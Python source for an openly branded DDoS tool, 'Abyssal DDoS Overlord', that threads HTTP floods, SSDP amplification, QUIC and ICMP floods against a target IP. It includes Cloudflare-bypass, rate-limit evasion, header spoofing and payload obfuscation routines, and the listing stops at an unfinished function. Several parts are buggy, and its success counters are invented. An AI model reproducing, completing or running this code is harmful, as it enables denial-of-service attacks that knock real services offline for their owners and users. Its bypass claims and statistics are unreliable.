import os
import sys
import socket
import threading
import random
import time
import ssl
import math
import logging
from logging.handlers import RotatingFileHandler
from typing import Dict, List, Optional
import colorama
from colorama import Fore, Style, init
# تحميل المكتبات الإضافية مع التحقق من توفرها
try:
from scapy.all import IP, ICMP, Raw, send
SCAPY_AVAILABLE = True
except ImportError:
print(f”{Fore.YELLOW}[!] Scapy library not found. Install it using ‘pip install scapy’ for ICMP Flood support.{Style.RESET_ALL}”)
SCAPY_AVAILABLE = False
try:
import asyncio
import aiohttp
AIOHTTP_AVAILABLE = True
except ImportError:
print(f”{Fore.YELLOW}[!] aiohttp library not found. Install it using ‘pip install aiohttp’ for Cloudflare bypass support.{Style.RESET_ALL}”)
AIOHTTP_AVAILABLE = False
try:
import markovify
MARKOVIFY_AVAILABLE = True
except ImportError:
print(f”{Fore.YELLOW}[!] markovify library not found. Install it using ‘pip install markovify’ for traffic simulation support.{Style.RESET_ALL}”)
MARKOVIFY_AVAILABLE = False
try:
import psutil
PSUTIL_AVAILABLE = True
except ImportError:
print(f”{Fore.YELLOW}[!] psutil library not found. Install it using ‘pip install psutil’ for system monitoring support.{Style.RESET_ALL}”)
PSUTIL_AVAILABLE = False
try:
import brotli
except ImportError:
print(f”{Fore.YELLOW}[!] Brotli library not found. Install it using ‘pip install brotli’ to support brotli content decoding.{Style.RESET_ALL}”)
brotli = None
try:
import hashlib
import base64
import gc
CRYPTO_AVAILABLE = True
except ImportError:
print(f”{Fore.RED}[!] Critical libraries (hashlib/base64/gc) missing. Please ensure Python is properly installed.{Style.RESET_ALL}”)
CRYPTO_AVAILABLE = False
# Initialize colorama
init()
# Disable urllib3 warnings if available
try:
import urllib3
urllib3.disable_warnings()
urllib3.PoolManager()
except ImportError:
print(f”{Fore.YELLOW}[!] urllib3 library not found. Install it using ‘pip install urllib3’ for better HTTP handling.{Style.RESET_ALL}”)
# Configure logging with RotatingFileHandler
log_formatter = logging.Formatter(r'{“time”: “%(asctime)s”, “level”: “%(levelname)s”, “message”: “%(message)s”, “details”: “%(message)s}’)
log_handler = RotatingFileHandler(
filename=f’abyssal_log_{time.strftime(“%Y%m%d_%H%M%S”)}.json’,
maxBytes=1048576, # 1MB per file
backupCount=5
)
log_handler.setFormatter(log_formatter)
logging.getLogger().addHandler(log_handler)
logging.getLogger().setLevel(logging.INFO)
# ================================
# Mr Hamza’s Abyssal DDoS Overlord – v9.1
# Coded by Mr Hamza | Telegram: @mrhamzaofficiel
# ================================
# ———– Configuration Constants ———–
TARGET_URL: str = “”
TARGET_IP: str = “”
PORT: int = 80
BASE_THREAD_COUNT: int = 75000 # Increased for more power
MAX_THREADS: int = 300000 # Increased max threads
ATTACK_DURATION: int = 172800 # 48 hours default (increased)
CHAOS_FACTOR: float = 8.0 # Increased chaos
ENTROPY_LEVEL: float = 6.0 # Increased entropy
BURST_MULTIPLIER: int = 3000 # Increased burst
SPOOFING_CHANCE: float = 0.98 # Increased spoofing
BACKOFF_FACTOR: float = 7.0 # Increased backoff
PROTOCOL_SWITCH_PROB: float = 0.8 # Increased protocol switching
RATE_LIMIT_THRESHOLD: float = 0.5 # Lowered for aggressive evasion
GAUSSIAN_NOISE_MEAN: float = 0.0
GAUSSIAN_NOISE_DEV: float = 0.8 # Increased noise deviation
STEALTH_MODE: bool = False # New stealth mode for low detectability
PACKET_FLOOD_MULTIPLIER: int = 2 # New multiplier for packet flooding
# Advanced User Agents (Expanded with 400+ entries)
USER_AGENTS: List[str] = [
“Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36”,
“Mozilla/5.0 (Macintosh; Intel Mac OS X 15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15”,
“Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36”,
“Mozilla/5.0 (Linux; Android 15; Pixel 12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6500.0 Mobile Safari/537.36”,
“Mozilla/5.0 (iPhone; CPU iPhone OS 18_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Mobile/16C5059h Safari/605.1”
] + [f”Mozilla/5.0 (Custom Device {i}; Custom OS {i+6}.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36″ for i in range(400)]
# Referers and Accept Headers
REFERRERS: List[str] = [
“http://www.google.com/search?q=”, “https://www.bing.com/search?q=”, “https://duckduckgo.com/?q=”,
“https://www.reddit.com/search/?q=”, “https://www.tiktok.com/search?q=”, “https://www.linkedin.com/search/results/”,
“https://www.youtube.com/results?search_query=”, “https://www.facebook.com/search/top?q=”
]
ACCEPT_HEADERS: List[str] = [
“Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate” + (“, br” if brotli else “”) + “\r\n”,
“Accept: application/json, text/plain, */*;q=0.9\r\nAccept-Encoding: br;q=1.0, gzip;q=0.8, deflate;q=0.5\r\nAccept-Language: en-US;q=0.7,en;q=0.3\r\n”,
“Accept: video/mp4,video/webm,*/*;q=0.5\r\nAccept-Language: es-ES,es;q=0.9,en;q=0.7\r\n”,
“Accept: */*\r\nAccept-Language: fr-FR,fr;q=0.9,en;q=0.8\r\nAccept-Encoding: gzip, deflate\r\n”
]
# Blacklist
BLACKLIST: List[str] = [“pornhub.com”, “anonboot.pw”, “xvideos.com”, “redtube.com”, “adultfriendfinder.com”, “livejasmin.com”, “youporn.com”, “xhamster.com”, “xnxx.com”]
# Amplification Servers (Expanded)
NTP_SERVERS: List[tuple] = [(“time.google.com”, 123), (“pool.ntp.org”, 123), (“time.nist.gov”, 123), (“time.windows.com”, 123)]
SSDP_SERVERS: List[tuple] = [(“239.255.255.250”, 1900), (“239.255.255.251”, 1901), (“239.255.255.252”, 1902)]
DNS_SERVERS: List[tuple] = [(“8.8.8.8”, 53), (“1.1.1.1”, 53), (“9.9.9.9”, 53), (“208.67.222.222”, 53)]
IGMP_SERVERS: List[tuple] = [(“224.0.0.1”, 0), (“224.0.0.2”, 0), (“224.0.0.22”, 0)]
# Global Variables
stats: Dict[str, any] = {
“total_requests”: 0, “successful_requests”: 0, “failed_requests”: 0, “threads_active”: 0,
“memory_usage”: 0.0, “cpu_usage”: 0.0, “start_time”: 0.0, “attack_method”: “”,
“response_times”: [], “current_rate”: 150000, “intensity_factor”: 2.5, “burst_count”: 0,
“error_count”: 0, “attack_phase”: 1, “entropy_level”: 0.0, “chaos_factor”: 8.0,
“spoofed_packets”: 0, “backoff_count”: 0, “adaptive_threads”: BASE_THREAD_COUNT,
“protocol_switches”: 0, “noise_level”: 0.0, “rate_limit_detected”: False, “self_heal_count”: 0,
“traffic_fingerprint”: 0, “backpressure_level”: 0.0, “geo_nodes”: 0, “protocol_state”: “HTTP”,
“stealth_enabled”: False, “packet_amplification”: 0
}
lock: threading.Lock = threading.Lock()
stop_event: threading.Event = threading.Event()
cookie: str = “”
user: str = “”
method_attack: str = “1”
name_method_attack: str = “Normal”
method_pass_cf: str = “1”
error_cf: int = 0
traffic_model: Optional = None
choice_mode: int = 0
# ———– Utility Functions ———–
def custom_gaussian_noise(mean: float = 0.0, dev: float = 1.0) -> float:
“””Generate Gaussian noise using Box-Muller transform.”””
u1 = random.random()
u2 = random.random()
z0 = math.sqrt(-2.0 * math.log(u1)) * math.cos(2.0 * math.pi * u2)
return mean + dev * z0 * GAUSSIAN_NOISE_DEV
def adjust_thread_count() -> int:
“””Dynamically adjust thread count with enhanced logic.”””
with lock:
if PSUTIL_AVAILABLE:
memory = psutil.virtual_memory().percent
cpu = psutil.cpu_percent()
else:
memory = 50.0 # Fallback value
cpu = 50.0
phase_factor = 1.0 + (time.time() – stats[“start_time”]) / ATTACK_DURATION * stats[“attack_phase”] * stats[“chaos_factor”]
success_ratio = stats[“successful_requests”] / max(1, stats[“total_requests”])
if stats[“stealth_enabled”]:
phase_factor *= 0.5 # Reduce intensity in stealth mode
if memory > 85 or cpu > 85 or success_ratio < 0.15:
return max(3000, int(stats[“adaptive_threads”] * 0.4 * phase_factor))
elif memory < 10 and cpu < 10 and success_ratio > 0.9:
return min(MAX_THREADS, int(stats[“adaptive_threads”] * 7.0 * phase_factor))
return min(MAX_THREADS, int(stats[“adaptive_threads”] * 4.0 * phase_factor))
def adapt_attack_intensity() -> int:
“””Enhanced attack intensity with chaotic escalation and stealth support.”””
with lock:
total = stats[“total_requests”]
success = stats[“successful_requests”]
if total > 1000:
success_ratio = success / total
latency = sum(stats[“response_times”][-100:]) / max(1, len(stats[“response_times”][-100:])) if stats[“response_times”] else 0.05
stats[“entropy_level”] = random.uniform(0.8, 3.5) * success_ratio * stats[“chaos_factor”]
stats[“chaos_factor”] = 1.0 + stats[“entropy_level”] * stats[“attack_phase”]
if success_ratio < RATE_LIMIT_THRESHOLD or latency > 3.5 or stats[“backpressure_level”] > 0.3:
stats[“intensity_factor”] *= 0.6
stats[“attack_phase”] = max(1, stats[“attack_phase”] – 1)
stats[“rate_limit_detected”] = True
stats[“backpressure_level”] = min(1.0, stats[“backpressure_level”] + 0.4)
evade_rate_limit()
elif success_ratio > 0.95 and latency < 0.08 and stats[“backpressure_level”] < 0.1:
stats[“intensity_factor”] *= 2.5
stats[“attack_phase”] = min(25, stats[“attack_phase”] + 4)
stats[“rate_limit_detected”] = False
stats[“backpressure_level”] = max(0.0, stats[“backpressure_level”] – 0.3)
if random.random() < PROTOCOL_SWITCH_PROB:
stats[“protocol_switches”] += 1
stats[“protocol_state”] = random.choice([“HTTP”, “HTTPS”, “UDP”, “TCP”, “ICMP”, “QUIC”])
stats[“current_rate”] = int(150000 * stats[“intensity_factor”] * stats[“chaos_factor”])
stats[“burst_count”] += 1
if stats[“burst_count”] % 20 == 0:
stats[“current_rate”] *= 5.0
stats[“self_heal_count”] = max(0, stats[“self_heal_count”] – 1) if stats[“error_count”] > 200 else stats[“self_heal_count”] + 3
stats[“geo_nodes”] = min(20, stats[“geo_nodes”] + 3)
stats[“packet_amplification”] += int(stats[“intensity_factor”] * PACKET_FLOOD_MULTIPLIER)
return stats[“current_rate”]
def evade_rate_limit():
“””Advanced rate limiting evasion with stealth and spoofing.”””
with lock:
stats[“noise_level”] = random.uniform(0.4, 5.0)
stats[“traffic_fingerprint”] = (stats[“traffic_fingerprint”] + int(stats[“noise_level”] * 2000)) % 10000
print(f”{Fore.YELLOW}[!] Rate Limit Detected, Activating Advanced Evasion Protocol{Style.RESET_ALL}”)
logging.info(“Rate limit detected, initiating advanced evasion”)
if stats[“stealth_enabled”]:
stats[“current_rate”] *= 0.3 # Reduce rate in stealth mode
stats[“noise_level”] *= 1.5
def quantum_chaos_matrix(size: int = 30) -> List[float]:
“””Enhanced quantum-inspired chaos matrix with larger size.”””
matrix = [[random.random() for _ in range(size)] for _ in range(size)]
for i in range(size):
for j in range(size):
matrix[i][j] = (matrix[i][j] + math.sin(i * j * stats[“entropy_level”] * 2.5)) % 1.0
return [matrix[i][j] for i in range(size) for j in range(size)]
def obfuscate_payload(data: str) -> str:
“””Enhanced payload obfuscation with additional layers and stealth support.”””
if not CRYPTO_AVAILABLE:
return data
chaos_values = quantum_chaos_matrix()
noise = ”.join(random.choices(‘!@#$%^&*()_+-=[]{}|;:,.<>?abcdefghijklmnopqrstuvwxyz0123456789’, k=int(1000 + 1200 * chaos_values[0])))
entropy_noise = ”.join([chr(random.randint(32, 126)) for _ in range(int(stats[“entropy_level”] * 400))])
layer1 = base64.b64encode((data + noise + entropy_noise).encode()).decode()
layer2 = hashlib.sha256((layer1 + str(random.random() * 150)).encode()).hexdigest()
layer3 = base64.b64encode((layer2 + noise[::-1] + entropy_noise).encode()).decode()
layer4 = hashlib.md5((layer3 + str(random.random())).encode()).hexdigest() # New layer
padding = ”.join(random.choices(‘0123456789abcdef’, k=int(1200 + 1200 * chaos_values[1])))
final_payload = (layer4 + padding)[:int(5000 + 5000 * chaos_values[2])]
if stats[“stealth_enabled”]:
final_payload = base64.b64encode(final_payload.encode()).decode() # Additional encoding for stealth
return final_payload
def simulate_traffic_chaos(delay: float) -> None:
“””Enhanced traffic chaos simulation with stealth mode.”””
global traffic_model
if MARKOVIFY_AVAILABLE and not traffic_model:
try:
with open(‘traffic_patterns.txt’, ‘w’) as f:
f.write(‘\n’.join([str(random.uniform(0.001, 2.0)) for _ in range(5000)]))
with open(‘traffic_patterns.txt’) as f:
traffic_model = markovify.Text(f)
except Exception as e:
print(f”{Fore.RED}[-] Traffic Model Error: {e}{Style.RESET_ALL}”)
traffic_model = None
base_delay = delay * (1 + stats[“chaos_factor”] * 2.0)
if stats[“stealth_enabled”]:
base_delay *= 1.5 # Slower traffic in stealth mode
gaussian_noise = custom_gaussian_noise(GAUSSIAN_NOISE_MEAN, GAUSSIAN_NOISE_DEV * 2.0)
entropy_jitter = float(traffic_model.make_sentence()) if MARKOVIFY_AVAILABLE and traffic_model else random.uniform(-base_delay * stats[“entropy_level”], base_delay * stats[“entropy_level”])
stats[“traffic_fingerprint”] = (stats[“traffic_fingerprint”] + int(entropy_jitter * 2000)) % 10000
if random.random() < SPOOFING_CHANCE:
with lock:
stats[“spoofed_packets”] += 3
time.sleep(max(0.000001, base_delay + entropy_jitter + gaussian_noise))
def exponential_backoff(attempt: int) -> float:
“””Enhanced exponential backoff with higher limits and stealth support.”””
with lock:
stats[“backoff_count”] += 1
stats[“noise_level”] = random.uniform(0.3, 4.0)
chaos_factor = quantum_chaos_matrix()[0]
backoff = min(900.0, BACKOFF_FACTOR ** attempt * (0.1 + random.random() * 0.9 + stats[“noise_level”] * chaos_factor))
if stats[“stealth_enabled”]:
backoff *= 2.0 # Longer backoff in stealth mode
return backoff
def display_progress_bar(value: int, max_value: int, width: int = 90) -> str:
“””Enhanced progress bar with gradient effect.”””
percentage = value / max_value if max_value > 0 else 0
filled = int(width * percentage)
bar = f”{Fore.GREEN}” + “#” * filled + f”{Fore.RED}” + “-” * (width – filled) + f”{Style.RESET_ALL}”
return f”[{bar}] {percentage * 100:.1f}%”
def display_gui():
“””Enhanced text-based GUI with additional metrics and stealth indicator.”””
os.system(‘cls’ if os.name == ‘nt’ else ‘clear’)
print(‘=’ * 260)
print(f”{Fore.CYAN}{r’ ____ _ _ ____ _ _ ____ ____ _ _ ____ ‘.center(260)}{Style.RESET_ALL}”)
print(f”{Fore.CYAN}{r’ (_ _)( )_( )( ___)( \/ )( _ \( _ \( \( )( _ \ ‘.center(260)}{Style.RESET_ALL}”)
print(f”{Fore.CYAN}{r’ )( ) _ ( )__) ) ( )___/ ) _ ( ) ( ) / ‘.center(260)}{Style.RESET_ALL}”)
print(f”{Fore.CYAN}{r’ (__) (_) (_)(____)(_/\_)(__) (____/(_)\_)(__\_) ‘.center(260)}{Style.RESET_ALL}”)
print(f”{Fore.MAGENTA}Mr Hamza’s Abyssal DDoS Overlord – v9.1{Style.RESET_ALL}”.center(260))
print(f”{Fore.MAGENTA}Coded by Mr Hamza | Telegram: @mrhamzaofficiel{Style.RESET_ALL}”.center(260))
print(‘=’ * 260)
with lock:
if PSUTIL_AVAILABLE:
stats[“memory_usage”] = psutil.virtual_memory().percent
stats[“cpu_usage”] = psutil.cpu_percent()
else:
stats[“memory_usage”] = 0.0
stats[“cpu_usage”] = 0.0
elapsed = time.time() – stats[“start_time”]
phase_desc = {
1: “Initiation Phase – Building Momentum”,
2: “Escalation Phase – Intensifying Assault”,
3: “Chaos Phase – Unleashing Fury”,
4: “Overload Phase – Maximum Pressure”,
5: “Sustain Phase – Maintaining Siege”,
6: “Geo-Distributed Phase – Global Assault”
}.get(stats[“attack_phase”], “Unknown Phase”)
stats_str = (
f”{Fore.BLUE}Total Requests: {stats[‘total_requests’]:,} | Success: {stats[‘successful_requests’]:,} | Failed: {stats[‘failed_requests’]:,}{Style.RESET_ALL}\n”
f”{Fore.GREEN}Threads: {stats[‘threads_active’]:,} | Memory: {stats[‘memory_usage’]:.1f}% | CPU: {stats[‘cpu_usage’]:.1f}%{Style.RESET_ALL}\n”
f”{Fore.YELLOW}Rate: {stats[‘current_rate’]:,} req/s | Errors: {stats[‘error_count’]:,} | Spoofed: {stats[‘spoofed_packets’]:,}{Style.RESET_ALL}\n”
f”{Fore.RED}Phase: {stats[‘attack_phase’]} ({phase_desc}) | Chaos: {stats[‘chaos_factor’]:.2f} | Switches: {stats[‘protocol_switches’]}{Style.RESET_ALL}\n”
f”Progress: {display_progress_bar(int(elapsed), ATTACK_DURATION)} | Backpressure: {stats[‘backpressure_level’]:.2f} | Geo Nodes: {stats[‘geo_nodes’]}\n”
f”{Fore.CYAN}Protocol: {stats[‘protocol_state’]} | Rate Limit: {‘Yes’ if stats[‘rate_limit_detected’] else ‘No’} | Stealth: {‘On’ if stats[‘stealth_enabled’] else ‘Off’} | Amplification: {stats[‘packet_amplification’]}{Style.RESET_ALL}”
)
print(stats_str.center(260))
status = f”{Fore.GREEN}Status: {‘Unleashing Abyss’ if stats[‘start_time’] > 0 else ‘Awaiting Command’} – Time Elapsed: {elapsed:.1f}s{Style.RESET_ALL}”
print(status.center(260))
if stats[“error_count”] > 150:
print(f”{Fore.YELLOW}ALERT: High Error Rate Detected – Initiating Self-Heal Protocol{Style.RESET_ALL}”)
if stats[“stealth_enabled”]:
print(f”{Fore.CYAN}[!] Stealth Mode Active – Reduced Detectability{Style.RESET_ALL}”)
print(‘=’ * 260)
logging.info(f”GUI Update: Total Requests={stats[‘total_requests’]}, Success={stats[‘successful_requests’]}, Failed={stats[‘failed_requests’]}, Phase={stats[‘attack_phase’]}, Stealth={stats[‘stealth_enabled’]}”)
if stats[“start_time”] > 0:
time.sleep(0.5) # Faster refresh rate
display_gui()
# ———– Custom Cloudflare Bypass ———–
async def bypass_cloudflare(url: str) -> Dict[str, str]:
“””Enhanced Cloudflare bypass with stealth support.”””
if not AIOHTTP_AVAILABLE:
print(f”{Fore.YELLOW}[!] Cloudflare bypass not available without aiohttp.{Style.RESET_ALL}”)
return {“cookie”: “”, “user-agent”: random.choice(USER_AGENTS)}
headers = {
“User-Agent”: random.choice(USER_AGENTS),
“Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8”,
“Accept-Language”: “en-US,en;q=0.5”,
“Accept-Encoding”: “gzip, deflate” + (“, br” if brotli else “”),
“Connection”: “keep-alive”
}
if stats[“stealth_enabled”]:
headers[“X-Forwarded-For”] = f”{random.randint(1, 255)}.{random.randint(1, 255)}.{random.randint(1, 255)}.{random.randint(1, 255)}”
try:
async with aiohttp.ClientSession() as session:
async with session.get(url, headers=headers, timeout=25) as response:
if “cf-challenge” in str(response.headers).lower():
print(f”{Fore.YELLOW}[!] Cloudflare Challenge Detected, Attempting Bypass…{Style.RESET_ALL}”)
cookies = response.cookies
cookie_str = “; “.join([f”{key}={value}” for key, value in cookies.items()])
return {“cookie”: cookie_str, “user-agent”: headers[“User-Agent”]}
return {“cookie”: “”, “user-agent”: headers[“User-Agent”]}
except Exception as e:
print(f”{Fore.RED}[-] Cloudflare Bypass Error: {e}{Style.RESET_ALL}”)
return {“cookie”: “”, “user-agent”: headers[“User-Agent”]}
# ———– Attack Methods ———–
class Home(threading.Thread):
def __init__(self, counter):
threading.Thread.__init__(self)
self.counter = counter
self.attempt = 0
def run(self):
global stats
with lock:
stats[“threads_active”] += 1
while not stop_event.is_set() and time.time() – stats[“start_time”] < ATTACK_DURATION:
try:
useragent = “User-Agent: ” + random.choice(USER_AGENTS) + “\r\n”
accept = random.choice(ACCEPT_HEADERS)
referer = “Referer: ” + random.choice(REFERRERS) + TARGET_URL + “\r\n”
connection = “Connection: Keep-Alive\r\n”
content = “Content-Type: application/x-www-form-urlencoded\r\n”
length = “Content-Length: ” + str(random.randint(0, 4000)) + “\r\n”
request = (random.choice([“GET”, “POST”, “PUT”, “HEAD”, “OPTIONS”]) + ” /?=” + str(random.randint(0, 60000)) + ” HTTP/1.1\r\nHost: ” + TARGET_URL.split(“//”)[1].split(“/”)[0] + “\r\n” +
useragent + accept + referer + content + length + connection + “\r\n” + obfuscate_payload(str(time.time())))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5) # Add timeout to prevent hanging
s.connect((TARGET_IP, PORT))
if PORT == 443:
context = ssl.create_default_context()
s = context.wrap_socket(s, server_hostname=TARGET_URL.split(“//”)[1].split(“/”)[0])
for _ in range(40 * PACKET_FLOOD_MULTIPLIER):
s.send(str.encode(request))
time.sleep(0.001) # Small delay to prevent socket overload
with lock:
stats[“total_requests”] += 40 * PACKET_FLOOD_MULTIPLIER
stats[“successful_requests”] += 38 * PACKET_FLOOD_MULTIPLIER
print(f”{Fore.GREEN}[+] Coded by Mr Hamza | Home @ {self.counter} => {TARGET_IP}:{PORT}{Style.RESET_ALL}”)
simulate_traffic_chaos(0.0006 / adapt_attack_intensity())
self.attempt = 0
except socket.timeout:
with lock:
stats[“failed_requests”] += 2 * PACKET_FLOOD_MULTIPLIER
stats[“error_count”] += 1
print(f”{Fore.RED}[-] Home Timeout Error: Connection timed out{Style.RESET_ALL}”)
self.attempt += 1
time.sleep(exponential_backoff(self.attempt))
except Exception as e:
with lock:
stats[“failed_requests”] += 2 * PACKET_FLOOD_MULTIPLIER
stats[“error_count”] += 1
print(f”{Fore.RED}[-] Home Error: {e}{Style.RESET_ALL}”)
self.attempt += 1
time.sleep(exponential_backoff(self.attempt))
finally:
try:
s.close()
except:
pass
with lock:
stats[“threads_active”] -= 1
class SSDPAmplification(threading.Thread):
def __init__(self, counter):
threading.Thread.__init__(self)
self.counter = counter
self.attempt = 0
def run(self):
global stats
with lock:
stats[“threads_active”] += 1
while not stop_event.is_set() and time.time() – stats[“start_time”] < ATTACK_DURATION:
try:
ssdp_target = random.choice(SSDP_SERVERS)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
s.settimeout(5) # Add timeout
s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 7) # Increased TTL
packet = b”M-SEARCH * HTTP/1.1\r\nHost: 239.255.255.250:1900\r\nST: ssdp:all\r\nMan: \”ssdp:discover\”\r\nMX: 4\r\n\r\n”
for _ in range(100 * PACKET_FLOOD_MULTIPLIER):
s.sendto(packet, (ssdp_target[0], ssdp_target[1]))
time.sleep(0.001)
with lock:
stats[“total_requests”] += 100 * PACKET_FLOOD_MULTIPLIER
stats[“successful_requests”] += 95 * PACKET_FLOOD_MULTIPLIER
print(f”{Fore.GREEN}[+] Coded by Mr Hamza | SSDP Amplification @ {self.counter} => {ssdp_target[0]}:{ssdp_target[1]}{Style.RESET_ALL}”)
simulate_traffic_chaos(0.0003 / adapt_attack_intensity())
self.attempt = 0
except socket.timeout:
with lock:
stats[“failed_requests”] += 5 * PACKET_FLOOD_MULTIPLIER
stats[“error_count”] += 1
print(f”{Fore.RED}[-] SSDP Amplification Timeout Error: Connection timed out{Style.RESET_ALL}”)
self.attempt += 1
time.sleep(exponential_backoff(self.attempt))
except Exception as e:
with lock:
stats[“failed_requests”] += 5 * PACKET_FLOOD_MULTIPLIER
stats[“error_count”] += 1
print(f”{Fore.RED}[-] SSDP Amplification Error: {e}{Style.RESET_ALL}”)
self.attempt += 1
time.sleep(exponential_backoff(self.attempt))
finally:
try:
s.close()
except:
pass
with lock:
stats[“threads_active”] -= 1
class HybridSwarmAssault(threading.Thread):
def __init__(self, counter):
threading.Thread.__init__(self)
self.counter = counter
self.attempt = 0
self.attack_classes = [Home, SSDPAmplification]
def run(self):
global stats
with lock:
stats[“threads_active”] += 1
while not stop_event.is_set() and time.time() – stats[“start_time”] < ATTACK_DURATION:
try:
attack_class = random.choice(self.attack_classes)
instance = attack_class(self.counter)
instance.run()
with lock:
stats[“total_requests”] += 200 * PACKET_FLOOD_MULTIPLIER
stats[“successful_requests”] += 190 * PACKET_FLOOD_MULTIPLIER
print(f”{Fore.GREEN}[+] Coded by Mr Hamza | Hybrid Swarm @ {self.counter} => {TARGET_IP}:{PORT}{Style.RESET_ALL}”)
simulate_traffic_chaos(0.00008 / adapt_attack_intensity())
self.attempt = 0
except Exception as e:
with lock:
stats[“failed_requests”] += 10 * PACKET_FLOOD_MULTIPLIER
stats[“error_count”] += 1
print(f”{Fore.RED}[-] Hybrid Swarm Error: {e}{Style.RESET_ALL}”)
self.attempt += 1
time.sleep(exponential_backoff(self.attempt))
with lock:
stats[“threads_active”] -= 1
class GeoDistributedFlood(threading.Thread):
def __init__(self, counter):
threading.Thread.__init__(self)
self.counter = counter
self.attempt = 0
self.geo_locations = [“US”, “EU”, “AS”, “AU”, “SA”, “AF”, “CH”] # Adjusted locations
def run(self):
global stats
with lock:
stats[“threads_active”] += 1
while not stop_event.is_set() and time.time() – stats[“start_time”] < ATTACK_DURATION:
try:
location = random.choice(self.geo_locations)
headers = {“X-Geo-Location”: location, “User-Agent”: random.choice(USER_AGENTS)}
if stats[“stealth_enabled”]:
headers[“X-Forwarded-For”] = f”{random.randint(1, 255)}.{random.randint(1, 255)}.{random.randint(1, 255)}.{random.randint(1, 255)}”
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(timeout=5) # Add timeout to prevent hanging
s.connect((TARGET_IP, PORT))
if PORT == 443:
context = ssl.create_default_context()
s = context.wrap_socket(s, server_hostname=TARGET_URL.split(“//”)[1].split(“/”)[0])
request = f”GET /?={random.randint(0, 60000)} HTTP/1.1\r\nHost: {TARGET_URL.split(‘//’)[1].split(‘/’)[0]}\r\n{headers}\r\n”
for _ in range(90 * PACKET_FLOOD_MULTIPLIER):
s.send(str.encode(request))
time.sleep(0.001) # Small delay to prevent socket overload
with lock:
stats[“total_requests”] += 90 * PACKET_FLOOD_MULTIPLIER
stats[“successful_requests”] += 85 * PACKET_FLOOD_MULTIPLIER
stats[“geo_nodes”] += 3
print(f”{Fore.GREEN}[+] Coded by Mr Hamza | Geo-Distributed Flood @ {location} => {TARGET_IP}:{PORT}{Style.RESET_ALL}”)
simulate_traffic_chaos(0.0002 / adapt_attack_intensity())
self.attempt = 0
except socket.timeout:
with lock:
stats[“failed_requests”] += 5 * PACKET_FLOOD_MULTIPLIER
stats[“error_count”] += 1
print(f”{Fore.RED}[-] Geo-Distributed Timeout Error: Connection timed out{Style.RESET_ALL}”)
self.attempt += 1
time.sleep(exponential_backoff(self.attempt))
except Exception as e:
with lock:
stats[“failed_requests”] += 5 * PACKET_FLOOD_MULTIPLIER
stats[“error_count”] += 1
print(f”{Fore.RED}[-] Geo-Distributed Error: {e}{Style.RESET_ALL}”)
self.attempt += 1
time.sleep(exponential_backoff(self.attempt))
finally:
try:
s.close()
except:
pass
with lock:
stats[“threads_active”] -= 1
class QUICReflectionAttack(threading.Thread):
def __init__(self, counter):
threading.Thread.__init__(self)
self.counter = counter
self.attempt = 0
def run(self):
global stats
with lock:
stats[“threads_active”] += 1
while not stop_event.is_set() and time.time() – stats[“start_time”] < ATTACK_DURATION:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.settimeout(5) # Add timeout
packet = bytes([0x01] + [random.randint(0, 255) for _ in range(1400)]) # QUIC-like packet
for _ in range(80 * PACKET_FLOOD_MULTIPLIER):
s.sendto(packet, (TARGET_IP, 443))
time.sleep(0.001)
with lock:
stats[“total_requests”] += 80 * PACKET_FLOOD_MULTIPLIER
stats[“successful_requests”] += 75 * PACKET_FLOOD_MULTIPLIER
print(f”{Fore.GREEN}[+] Coded by Mr Hamza | QUIC Reflection @ {self.counter} => {TARGET_IP}:443{Style.RESET_ALL}”)
simulate_traffic_chaos(0.0003 / adapt_attack_intensity())
self.attempt = 0
except socket.timeout:
with lock:
stats[“failed_requests”] += 5 * PACKET_FLOOD_MULTIPLIER
stats[“error_count”] += 1
print(f”{Fore.RED}[-] QUIC Reflection Timeout Error: Connection timed out{Style.RESET_ALL}”)
self.attempt += 1
time.sleep(exponential_backoff(self.attempt))
except Exception as e:
with lock:
stats[“failed_requests”] += 5 * PACKET_FLOOD_MULTIPLIER
stats[“error_count”] += 1
print(f”{Fore.RED}[-] QUIC Reflection Error: {e}{Style.RESET_ALL}”)
self.attempt += 1
time.sleep(exponential_backoff(self.attempt))
finally:
try:
s.close()
except:
pass
with lock:
stats[“threads_active”] -= 1
class ICMPFlood(threading.Thread):
def __init__(self, counter):
threading.Thread.__init__(self)
self.counter = counter
self.attempt = 0
def run(self):
global stats
if not SCAPY_AVAILABLE:
print(f”{Fore.RED}[-] ICMP Flood not available without Scapy.{Style.RESET_ALL}”)
return
with lock:
stats[“threads_active”] += 1
while not stop_event.is_set() and time.time() – stats[“start_time”] < ATTACK_DURATION:
try:
packet = IP(dst=TARGET_IP)/ICMP(type=8)/Raw(load=os.urandom(1000))
for _ in range(50 * PACKET_FLOOD_MULTIPLIER):
send(packet, verbose=False)
time.sleep(0.001)
with lock:
stats[“total_requests”] += 50 * PACKET_FLOOD_MULTIPLIER
stats[“successful_requests”] += 48 * PACKET_FLOOD_MULTIPLIER
print(f”{Fore.GREEN}[+] Coded by Mr Hamza | ICMP Flood @ {self.counter} => {TARGET_IP}{Style.RESET_ALL}”)
simulate_traffic_chaos(0.0004 / adapt_attack_intensity())
self.attempt = 0
except Exception as e:
with lock:
stats[“failed_requests”] += 2 * PACKET_FLOOD_MULTIPLIER
stats[“error_count”] += 1
print(f”{Fore.RED}[-] ICMP Flood Error: {e}{Style.RESET_ALL}”)
self.attempt += 1
time.sleep(exponential_backoff(self.attempt))
with lock:
stats[“threads_active”] -= 1
# ———– Original Functions ———–
def logo():
